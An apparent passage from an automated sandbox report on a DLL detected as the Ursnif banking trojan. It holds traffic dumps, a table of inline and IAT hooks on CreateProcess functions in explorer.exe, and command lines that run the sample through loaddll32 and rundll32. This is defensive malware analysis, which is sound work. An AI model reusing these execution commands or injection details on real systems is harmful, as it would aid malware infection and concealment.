                                                              2021-10-20 13:08:56 UTC70INData Raw: f4 0b 3f 4a b9 c0 45 aa a5 03 55 c0 bd ce c2 ec 0b 7e 1c 0e 70 a9 b0 30 c9 71 27 90 ea a8 8c 94 11 83 c4 b4 15 6b 87 42 9c 09 18 68 69 e4 62 55 a2 d8 dd 1a 60 08 b4 7e 50 6d 3b 08 2d 37 75 94 29 82 13 d8 2a 01 9d 80 19 c4 ad 08 73 68 39 8f 9c bf 99 e4 55 08 60 73 7e 59 91 e2 ae 6f 27 05 72 71 f7 70 62 54 06 3c 3d a5 d8 30 e0 4c a7 b9 c2 2d 12 bd e8 50 f2 e0 46 20 1c 42 21 d1 97 af f6 79 26 b6 66 1c 56 a0 ba 9d 27 10 72 27 27 2b 43 a9 a9 54 56 0f 20 90 d6 c6 23 aa 00 de 7f a8 f2 25 7e a1 a6 0f 2c 2e 12 37 c6 10 d5 69 9d b3 d8 7c 51 b5 c1 c0 93 69 08 11 04 1d cb 4f 92 b8 5a 09 80 bb 46 8e 89 b5 58 e3 00 85 7b 95 c7 b9 17 3c 1e e5 aa a8 2c 78 39 05 a5 69 b5 1e af 52 f8 90 44 10 31 20 a6 fa 4f 4f f4 bc 2a 67 d1 bb 1b be e4 a6 b3 d1 ae c8 14 8c a6 52 d3 d3 93
                                                              Data Ascii: ?JEU~p0q'kBhibU`~Pm;-7u)*sh9U`s~Yo'rqpbT<=0L-PF B!y&fV'r''+CTV #%~,.7i|QiOZFX{<,x9iRD1 OO*gR
                                                              2021-10-20 13:08:56 UTC72INData Raw: 4e 59 46 39 62 06 58 dc 8e ed 4f 51 0a d6 d3 40 28 de 46 a4 12 3d 56 11 53 a4 af de 17 36 70 4d 97 2b 5b 47 e3 4d e7 e7 d7 70 96 b6 92 9e 3c 21 91 e1 8d 22 49 e6 99 f1 04 06 05 14 5a e9 6e 35 b8 35 30 8d a6 57 db 21 a7 92 18 26 2e 4c 93 3c b9 a4 84 5c d9 c8 44 20 12 6c 6d a8 60 dc ea ea da 7a b5 11 4a 23 01 10 f5 1c 16 66 6e a1 0e 08 ea 8b 1e 75 51 47 57 05 2d 5d 3c f5 29 b5 c3 2a d6 8a 94 2b 69 03 ca 7b 71 ed 20 f1 aa 8d db 61 db a9 25 7a aa 49 dd 96 6d d1 51 01 45 91 e5 69 48 cd d1 15 55 6d 65 be ab f6 b9 fe 2f be fb 57 fb 46 78 e7 99 7a eb 75 0d 2a 24 63 05 5e 40 23 80 75 16 e5 5f bb 53 c9 54 95 11 83 f2 a2 38 86 4d 24 33 d9 6d 21 04 32 2a f7 5b 52 38 dd 69 56 98 d4 75 0b d6 85 89 c4 ca 8f 00 bf 5d 06 1c 4b 89 75 f0 7f bb 79 56 6e a3 3c a1 c6 28 63 01
                                                              Data Ascii: NYF9bXOQ@(F=VS6pM+[GMp<!"IZn550W!&.L<\D lm`zJ#fnuQGW-]<)*+i{q a%zImQEiHUme/WFxzu*$c^@#u_ST8M$3m!2*[R8iVu]KuyVn<(c
                                                              2021-10-20 13:08:56 UTC73INData Raw: 78 d7 c3 d4 b5 8f 2a 48 95 15 26 5a 72 b8 47 80 4b 3c 55 0b 81 3c 90 46 be 19 de a7 db cd 48 53 b2 7c 4e 94 53 32 d4 a6 0f 65 9a 9a 04 cc ad d7 55 1f 0c c3 25 3c 30 ac 5b 8d 19 a5 82 79 a3 91 df a9 fb 45 24 92 98 92 5a d9 3b 8f 60 35 50 89 24 4f 4b 24 55 12 54 ac ad d4 91 6a 13 a3 d5 c9 38 04 fd c1 e4 ea 8c d5 57 b4 a9 34 f3 52 09 a4 a2 11 82 23 f9 77 38 9e a6 4c 4e 76 ba 9f 1a a5 30 18 1a 28 e6 81 af 50 cf 18 52 85 d5 cf f8 7c f9 36 26 e4 f3 a9 04 93 41 24 6f c2 c2 b6 08 6f 97 71 b3 db d8 81 88 b0 d2 ca e5 93 10 12 ca 2f c0 3c 01 7b df d4 e9 a3 48 57 01 9c 87 20 82 ca 6c c3 cd c9 e0 69 6a 64 47 62 63 37 3e 39 e4 78 e3 1b e8 4e aa 1e f8 a9 04 00 6e 6e 00 be 20 f1 7d 15 cc 5e 32 a0 96 62 78 36 be 9d b8 16 6b 11 70 3e ff 00 ac d8 79 36 bd b4 76 bf 87 f6 a0
                                                              Data Ascii: x*H&ZrGK<U<FHS|NS2eU%<0[yE$Z;`5P$OK$UTj8W4R#w8LNv0(PR|6&A$ooq/<{HW lijdGbc7>9xNnn }^2bx6kp>y6v
                                                              2021-10-20 13:08:56 UTC74INData Raw: 74 97 73 a3 02 05 89 62 aa 95 10 33 8e 90 04 29 e9 a8 e9 df 1f 43 e4 e8 c5 32 3a ca 9b 55 0d 04 51 2c 8d 91 43 df 34 35 77 c5 58 1e e2 34 ed 35 05 14 cf 11 03 80 e2 36 64 c8 fa 06 60 16 fa 7a 5f 91 d9 68 aa eb 27 0e 9d ac ea c1 c9 67 0c 2c 19 0d f5 b1 d6 0a 88 01 86 9b 7e c6 8f e7 1f d5 a9 e7 71 4d 13 28 04 73 98 d5 3c 53 53 bb a5 4b d1 57 18 82 b2 70 42 ac 85 c1 fe 0d aa 98 38 e7 e7 69 45 51 fb 00 85 86 b6 87 cc 80 1f e4 a9 91 98 83 8f 20 80 da f8 78 b3 b1 66 78 a9 8d 24 ae 58 f2 6f 48 51 d8 e9 36 8d f3 65 af 06 a6 9a 2d ca 52 d2 c2 ff 00 be ab 5b 21 6b a1 b7 03 82 a7 43 68 9d 80 9e b5 60 08 8b 35 43 00 24 77 65 19 30 95 bb 88 24 db 49 2d 55 1c 0f 04 f0 07 06 55 11 b9 08 c5 7c d8 a5 b9 d4 f4 93 46 19 44 88 a8 d7 56 20 95 61 22 b0 20 95 1e 2c 7d 8e b6 d9
                                                              Data Ascii: tsb3)C2:UQ,C45wX456d`z_h'g,~qM(s<SSKWpB8iEQ xfx$XoHQ6e-R[!kCh`5C$we0$I-UU|FDV a" ,}
                                                              2021-10-20 13:08:56 UTC76INData Raw: a4 9e 2e bc 51 20 6c 1a 66 8c dc 3b 33 76 a0 61 61 62 75 1e db 5f b4 ee a9 49 bb 40 90 08 0c 4b 28 28 d7 4b 02 32 d7 2a c4 11 fa b2 1e eb cf eb ee 99 a3 41 f6 ca e7 fd 34 28 e9 21 88 cf 5d 56 57 21 4f 4e a4 02 c1 6e 32 72 48 54 5f 52 75 d2 12 d9 23 dc b7 03 f3 46 79 7c 2f 50 9e 22 2f ff 00 64 01 a4 a6 a2 df 29 27 a1 78 97 80 95 2a 73 88 db d2 ef 8e ac 75 50 df 2b 4e b3 d6 cf 14 42 41 02 bb 59 7a 84 90 10 7d 4f 9b ea 57 94 a6 32 83 2b 62 5d 0e 27 f2 11 c1 d7 c3 12 cf 11 ec a8 a9 a3 32 cc a7 dd 5d 8b 10 75 b6 6d cf f2 ce cd 53 07 51 d8 8c 4d f8 6b f1 aa df 88 a0 da 9c c2 b5 d4 91 b0 a7 71 25 a4 ea f5 d4 80 5a 4b e6 c1 98 9b ea 47 e1 15 33 9a 8d 0a e2 3c d8 48 aa 4f be 5a 85 1c f5 09 6f da 3b 7a db 3e 2d 81 9b 0d 6d 94 80 e0 19 a4 de 29 40 7b 79 bf e2 b3 6b
                                                              Data Ascii: .Q lf;3vaabu_I@K((K2*A4(!]VW!ONn2rHT_Ru#Fy|/P"/d)'x*suP+NBAYz}OW2+b]'2]umSQMkq%ZKG3<HOZo;z>-m)@{yk
                                                              2021-10-20 13:08:56 UTC77INData Raw: 37 3b 49 2f 62 33 a9 01 15 02 b2 b1 0f 6e 09 1a dc 25 92 57 ce 39 20 a9 8a 04 45 f1 63 13 44 e4 9f ae 43 5b 82 6d 3b 85 6d 4d 14 73 c7 4b 0d 50 4a 9a 65 47 78 65 1d 68 8a 3e 32 2b 2d fc 83 c6 be 38 10 38 e6 9f 6f a0 a6 a6 46 3f f6 8b d5 b8 d7 e9 1d 31 8d 11 23 81 76 d4 44 54 1e 15 5b 2d 7e 90 3e 2b dc 6e 0b 99 c5 1b e2 18 d8 34 cc 1b a5 12 7a 64 40 1a d9 7e 14 4a d9 9e 74 d9 ab f7 1a 5a aa 9a 25 97 92 8f f2 2b 51 c0 3f 93 8d 7c 2f c0 f0 bf b4 4d ff 00 96 dd aa 39 07 fd da 2a c9 0f f2 92 9a 2d 6f 92 1f 5e 96 c6 66 fe 59 55 41 af 89 aa 87 ff 00 22 48 3f fe 8c 9a f8 96 ac de f9 1a 9a 58 3f a3 c3 3e be 21 76 03 8c b7 2d b4 ff 00 a6 d9 ad ca 8a 71 0a a4 f5 30 ee b5 90 4b d2 27 2c 1a 4d bb e5 0e b7 9f 8a c5 6e d8 20 a0 db f7 fa 2a cd ca 7a 09 1b f1 18 d4 cd 53
                                                              Data Ascii: 7;I/b3n%W9 EcDC[m;mMsKPJeGxeh>2+-88oF?1#vDT[-~>+n4zd@~JtZ%+Q?|/M9*-o^fYUA"H?X?>!v-q0K',Mn *zS
                                                              2021-10-20 13:08:56 UTC78INData Raw: 70 a7 15 21 8f d2 fe 74 f2 18 b2 b2 86 96 56 bc 9c 9b 2d 8f a0 d3 ac 6d 18 92 39 7a cb 8b 5c da d6 c0 da c3 c6 85 60 69 ce 2e 71 3d a3 b8 d8 c3 6b 28 b9 00 79 b0 d2 cb d4 81 99 b3 92 42 83 12 08 2c 48 61 c5 c1 17 3a 82 48 a2 0a 47 4a 9f 08 b8 36 07 b9 df cf df 42 79 a9 4d c1 bc 0c c8 5c 06 55 20 02 41 b1 b8 e6 fc ea 68 62 31 80 94 ed 12 63 90 39 dd 4d ae cd eb c9 d6 e1 55 00 77 93 a6 b5 0f 16 59 12 59 79 6f 00 1b 81 7d 43 4c 91 46 03 8c 52 59 11 9b 9b 67 9f 69 1e 7c 5b 55 71 31 60 51 c5 3a 15 6f 16 4c b0 2b 8f a5 ec 48 d2 54 ca 41 e6 d8 dd d4 59 6e 19 31 bf dc e8 c2 2a 64 0b 99 10 53 a8 26 d6 16 95 c1 2d e0 da da 69 19 d4 46 d1 c8 d1 d8 03 75 17 30 23 5b 90 7c 6a 7d ba 79 2a 04 b3 25 3c cb 55 89 91 98 97 c2 64 c8 e4 45 c9 3c eb 73 31 9e ff 00 c7 a8 8d 57
                                                              Data Ascii: p!tV-m9z\`i.q=k(yB,Ha:HGJ6ByM\U Ahb1c9MUwYYyo}CLFRYgi|[Uq1`Q:oL+HTAYn1*dS&-iFu0#[|j}y*%<UdE<s1W
                                                              2021-10-20 13:08:56 UTC80INData Raw: f0 7d c8 1a 92 64 c0 c9 20 3d a1 6e 40 b7 68 b0 4f 71 a8 22 1d 8f 14 0d 54 a8 f1 80 cc 8e c5 94 da d8 9f 1c 5b 58 c6 82 47 77 8e 44 94 bb a1 00 04 01 81 c7 cf 26 da 65 92 15 c2 15 8e 95 9d 41 60 79 e1 1b 0e 34 cc d1 64 b1 9b f6 dd 54 9b 80 54 85 d1 25 d7 22 57 02 aa 5b b8 9f 2a 7f 90 d4 4e 7a 98 a3 9b 80 43 fa 58 5c 8d 4a a3 20 aa ab 20 25 3a 9e b9 0b b0 02 f7 62 0e ac ce a5 60 ca 7b 92 01 0a 4b 0b 8f 62 40 d4 52 1c 14 96 2a 09 52 45 88 3f 9b db d3 54 91 c0 1d 8b b0 8f c3 2d 90 37 02 ff 00 c4 8d 5a 32 51 6d 8e 4c 49 24 28 00 a7 81 ef 7d 45 23 49 c0 4c e2 95 a5 b1 1c 5a cc 41 f4 b7 81 e4 ea 54 89 5a 52 88 90 2c 7c 29 1d b2 74 ac 09 06 fd c7 8e 7d f4 c8 73 c5 0c b6 6b b1 50 2d 72 53 8b 8e 6e 09 b1 3c 8d 54 a3 47 50 51 f0 74 40 ae 19 87 8b 62 41 1d df 55 d4
                                                              Data Ascii: }d =n@hOq"T[XGwD&eA`y4dTT%"W[*NzCX\J %:b`{Kb@R*RE?T-7Z2QmLI$(}E#ILZATZR,|)t}skP-rSn<TGPQt@bAU
                                                              2021-10-20 13:08:56 UTC81INData Raw: 21 43 b0 5c 08 5c 01 2b 7b b2 37 04 12 07 37 07 44 49 d3 40 e8 b2 31 78 c2 b1 66 b6 57 00 8f 1e fa bc 88 55 6c ac 19 57 02 47 20 8b b1 b7 9b 72 75 53 b8 1a 76 58 f2 a6 a7 74 2a af 7e 4c 33 48 3b 94 81 63 c0 bf 8d 39 96 76 5b f5 90 82 92 1b 0c 43 a0 b0 b8 b9 36 b1 e3 53 86 86 ac bc 68 3e 68 14 61 26 4c 00 61 e1 8a 90 47 9f 6d 56 40 8a 50 2a a3 bf 8b 14 01 8f 00 12 47 a0 1c ea 91 9f e5 a7 8d 83 06 49 80 1c 84 24 80 45 96 c7 13 7e ed 24 d1 3b 03 22 ae 05 d0 92 0b df 8e 41 b7 dc e9 e9 9c 39 2e 43 81 73 23 76 de 4e 38 b8 27 ea 6f aa 8b 53 44 23 75 67 cd ec a5 8e 00 95 ca e0 28 07 16 bf 17 d4 91 3c 19 66 08 07 8b 10 5d 8f 1d a6 d7 c8 5a e3 53 4d 44 ed 60 11 5e 56 79 33 bc 41 4a a9 0a b6 1f 50 78 e4 6b 70 db a1 33 17 b3 c1 0c 97 66 90 d8 12 a5 c0 51 6e 40 e4 f9
                                                              Data Ascii: !C\\+{77DI@1xfWUlWG ruSvXt*~L3H;c9v[C6Sh>ha&LaGmV@P*GI$E~$;"A9.Cs#vN8'oSD#ug(<f]ZSMD`^Vy3AJPxkp3fQn@
                                                              2021-10-20 13:08:56 UTC82INData Raw: 6c 00 04 dc 11 73 7d 28 1d 4b 77 5d 81 0d e7 82 38 3e da 12 55 05 c6 33 d1 4e 11 81 6e e3 60 4d ad a2 24 6b a2 c8 ca 1b 12 05 b2 51 c5 b4 25 3d 3b 66 f6 00 9f 1f 53 eb a8 f3 ff 00 05 7f 74 70 d7 7b da f7 d7 42 aa 64 7b 08 d4 30 ec 17 6b 17 56 1c 79 d5 5c 51 42 d7 a8 8e 27 01 d9 2e 3b 5e dc 10 7c f1 a0 ca a8 1d 92 50 5c d8 f8 37 00 70 48 d4 13 bc ef 14 c0 f5 24 50 84 01 c7 27 8f 4f 1a a4 cb 35 5a 93 36 6d 9c 2c 7b 82 10 78 71 e8 4f 1a 96 24 80 e0 ea 64 51 9b 37 7f a5 f8 20 df 4c 1c b2 a2 43 3b 3b 23 06 62 32 18 13 c9 b7 ae b2 66 72 e1 26 ef 01 91 59 b2 06 d7 24 7d c7 1a 11 43 4f 1a ad 44 82 38 fa 93 44 07 0a 18 86 b0 3e c4 1d 55 4d 1d 47 4c bc 93 ca c1 88 b0 20 81 76 0a bc 58 da c7 56 8a 28 d6 25 6b 19 95 0d f0 2a af 25 dc 79 f3 6d 54 cb 4b 1c 7d 22 7a 71
                                                              Data Ascii: ls}(Kw]8>U3Nn`M$kQ%=;fStp{Bd{0kVy\QB'.;^|P\7pH$P'O5Z6m,{xqO$dQ7 LC;;#b2fr&Y$}COD8D>UMGL vXV(%k*%ymTK}"zq


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                              8           192.168.2.5  49832        151.101.1.44    443
                                                              Timestamp                kBytes transferred  Direction  Data
                                                              2021-10-20 13:08:56 UTC  83                  OUT        GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC  84                  IN         HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 22230
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 350692997626492799788231350738665822473,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "3a93f10be1638e14a4d5a8c3e39115a3"
                                                              expiration: expiry-date="Fri, 17 Sep 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Tue, 17 Aug 2021 13:05:16 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 100
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 23
                                                              X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Age: 3936644
                                                              X-Served-By: cache-wdc5520-WDC, cache-dca17772-DCA, cache-mxp6973-MXP
                                                              X-Cache: HIT, HIT, HIT
                                                              X-Cache-Hits: 1, 1, 2
                                                              X-Timer: S1634735336.230612,VS0,VE0
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png
                                                              X-vcl-time-ms: 0
                                                              2021-10-20 13:08:56 UTC85INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 09 09 09 09 0a 09 0a 0b 0b 0a 0e 0f 0d 0f 0e 15 13 11 11 13 15 1f 16 18 16 18 16 1f 30 1e 23 1e 1e 23 1e 30 2a 33 29 27 29 33 2a 4c 3b 35 35 3b 4c 57 49 45 49 57 6a 5f 5f 6a 85 7f 85 ae ae ea ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 06 00 02 07 01 08 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e4 73 37 de 40 2a ca c5 bd 73 94 98 a6
                                                              Data Ascii: JFIF+""+2*(*2<66<LHLdd0##0*3)')3*L;55;LWIEIWj__j75s7@*s
                                                              2021-10-20 13:08:56 UTC87INData Raw: a9 1a 8d 3d 46 0e 7a 76 9f 9e a5 3e 8d 19 d3 cb 17 b1 e2 25 c7 a4 0e 7e d8 fc 7f a8 e9 bc 5e 8f 53 ea e6 64 f2 9d ce 0b 07 cc 3d 3f 17 94 e7 75 5e ce 2d 13 f0 3c 0d 9a e9 be 87 cf 73 be 1f 74 28 d7 54 f5 01 23 4e f5 f3 63 1c 61 af e8 ff 00 19 03 9a f6 1d 95 7e 6e e4 7c dd f6 1f 9e fb 1b fe 1d d7 8e ce 52 cc e6 26 6a cb 99 fa 3e 47 2c 8b a7 75 f1 e3 3c 46 a1 8c eb 1e 8f cd 73 3e 0f 7c 18 df 54 6a 31 e2 fb 3f cb bb b7 b5 e0 3e fb 5f 98 8d 30 63 5a cf 37 75 3b 93 d2 41 87 5d e3 e6 7e e7 a7 6f 6e 16 53 b8 12 6b 3d 3f 0f 8c 4b e4 fd 9c 92 b9 89 3b f4 db 74 d9 82 d0 6c ce 10 4e e1 04 df 64 f9 d9 ea 7f a1 fe 7f 3e d1 e0 68 00 e7 ad 5b 9b be 8d c5 ea e9 f3 bf 6b d7 70 f5 2d b7 cd 1a 21 43 5f 53 c2 e5 12 f8 2f 67 21 15 11 a7 20 f0 23 0f 02 04 6e 18 02 c5 f6 ce 9f
                                                              Data Ascii: =Fzv>%~^Sd=?u^-<st(T#Nca~n|R&j>G,u<Fs>|Tj1?>_0cZ7u;A]~onSk=?K;tlNd>h[kp-!C_S/g! #n
                                                              2021-10-20 13:08:56 UTC89INData Raw: dd f7 c1 4d 10 59 d8 ae 21 3d 39 77 cc 22 55 05 0c 63 bc cd 6a fc 6c 9a f6 e4 6c 91 24 4a 7f 6f 9a ed 1f 35 1f ed e3 d5 2b 1a a1 64 a1 a6 af 95 f9 53 6a a4 fb c9 48 1c 59 62 af 56 49 38 d0 55 fe 71 d8 e0 62 10 60 79 37 76 5b 87 25 f0 f1 79 a6 3c e8 15 af 87 7b cd 31 25 35 87 0b ba 69 55 7c 5e a3 bd 94 ec 76 d0 d8 f8 db 00 9b 0d 33 13 59 ff 00 a8 68 97 66 3d cf 26 43 00 fc e7 32 10 70 36 8c 42 13 35 c0 0e d1 10 10 26 50 9b 6c 14 4d 06 82 d7 26 14 ab 4c 35 ed 9d 54 64 b2 c5 78 58 b9 3d 8c be 61 a7 57 16 6c af 08 77 c9 1b 48 a0 0e 95 09 51 05 83 1b d6 e5 09 86 90 c9 a2 2b 84 d7 0b 4e 69 b0 ea c9 9a 4f b4 74 90 b2 09 b7 2b b4 19 2f 9b 5d f1 33 ae 8c 75 3b 05 2c 7b 71 b8 b3 dc 79 a1 a9 50 ed 34 af 53 58 9a 69 3b 3b 5a 61 56 e2 d6 33 25 9d b1 51 f7 f2 19 ac 35


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              9 | 192.168.2.5 | 49833 | 151.101.1.44 | 443 |
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:08:56 UTC | 83 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC | 86 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 5940
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 479804938326989479466645211257047552033,376453762558522630792330837908987580524,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "83b82670ae366ff9ff6260e1c3bd76cd"
                                                              expiration: expiry-date="Sun, 17 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Thu, 16 Sep 2021 03:57:03 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 100
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 66
                                                              X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb201
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Age: 1818790
                                                              X-Served-By: cache-wdc5542-WDC, cache-dca17745-DCA, cache-mxp6956-MXP
                                                              X-Cache: HIT, MISS, HIT
                                                              X-Cache-Hits: 1, 0, 515
                                                              X-Timer: S1634735336.230813,VS0,VE0
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg
                                                              X-vcl-time-ms: 0


                                                              Code Manipulations

                                                              User Modules

                                                              Hook Summary

                                                              Function Name | Hook Type | Active in Processes
                                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe
                                                              CreateProcessAsUserW | EAT | explorer.exe
                                                              CreateProcessAsUserW | INLINE | explorer.exe
                                                              CreateProcessW | EAT | explorer.exe
                                                              CreateProcessW | INLINE | explorer.exe
                                                              CreateProcessA | EAT | explorer.exe
                                                              CreateProcessA | INLINE | explorer.exe

                                                              Processes

                                                              Process: explorer.exe, Module: WININET.dll
                                                              Function Name | Hook Type | New Data
                                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFA9B335200
                                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 66CA300

                                                              Process: explorer.exe, Module: user32.dll
                                                              Function Name | Hook Type | New Data
                                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFA9B335200
                                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 66CA300

                                                              Process: explorer.exe, Module: KERNEL32.DLL
                                                              Function Name | Hook Type | New Data
                                                              CreateProcessAsUserW | EAT | 7FFA9B33521C
                                                              CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                              CreateProcessW | EAT | 7FFA9B335200
                                                              CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                              CreateProcessA | EAT | 7FFA9B33520E
                                                              CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

                                                              Statistics

                                                              CPU Usage


                                                              Memory Usage


                                                              Behavior


                                                              System Behavior

                                                              General

                                                              Start time: 15:08:24
                                                              Start date: 20/10/2021
                                                              Path: C:\Windows\System32\loaddll32.exe
                                                              Wow64 process (32bit): true
                                                              Commandline: loaddll32.exe 'C:\Users\user\Desktop\gECym.dll'
                                                              Imagebase: 0x12e0000
                                                              File size: 893440 bytes
                                                              MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              Reputation: moderate

                                                              General

                                                              Start time: 15:08:25
                                                              Start date: 20/10/2021
                                                              Path: C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit): true
                                                              Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                                                              Imagebase: 0x150000
                                                              File size: 232960 bytes
                                                              MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Reputation: high

                                                              General

                                                              Start time: 15:08:25
                                                              Start date: 20/10/2021
                                                              Path: C:\Windows\SysWOW64\regsvr32.exe
                                                              Wow64 process (32bit): true
